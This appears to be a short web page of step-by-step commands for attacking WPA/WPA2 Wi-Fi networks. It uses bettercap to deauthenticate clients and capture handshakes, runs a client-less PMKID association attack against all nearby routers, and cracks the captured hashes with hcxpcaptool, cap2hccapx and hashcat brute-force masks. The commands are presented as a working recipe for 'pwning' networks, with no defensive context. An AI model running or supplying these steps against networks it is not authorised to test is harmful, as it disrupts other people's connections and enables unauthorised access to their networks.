Skip to content



Swiss army knife for network attacks and monitoring:

Pwning WPA/WPA2 Networks With Bettercap and the PMKID Client-Less Attack:

4 way handshake capture:

sudo bettercap -iface wlan0

# this will set the interface in monitor mode and start channel hopping on all supported frequencies
> wifi.recon on
# we want our APs sorted by number of clients for this attack, the default sorting would be `rssi asc`
> set clients desc
# every second, clear our view and present an updated list of nearby WiFi networks
> set ticker.commands 'clear;'
> ticker on 1
wifi.deauth e0:xx:xx:xx:xx:xx

Cracking 4-way handshake

/path/to/cap2hccapx /root/bettercap-wifi-handshakes.pcap bettercap-wifi-handshakes.hccapx
/path/to/hashcat -m2500 -a3 -w3 bettercap-wifi-handshakes.hccapx '?d?d?d?d?d?d?d?d'

Client-less PMKID Attack


# wifi.assoc supports 'all' (or `*`) or a specific BSSID, just like wifi.deauth
> wifi.assoc all
All nearby vulnerable routers (and let me reiterate: a lot of them are vulnerable), will start sending you the PMKID, which bettercap will dump to the usual pcap file:

PMKID Cracking

/path/to/hcxpcaptool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap
/path/to/hashcat -m16800 -a3 -w3 bettercap-wifi-handshakes.pmkid '?d?d?d?d?d?d?d?d'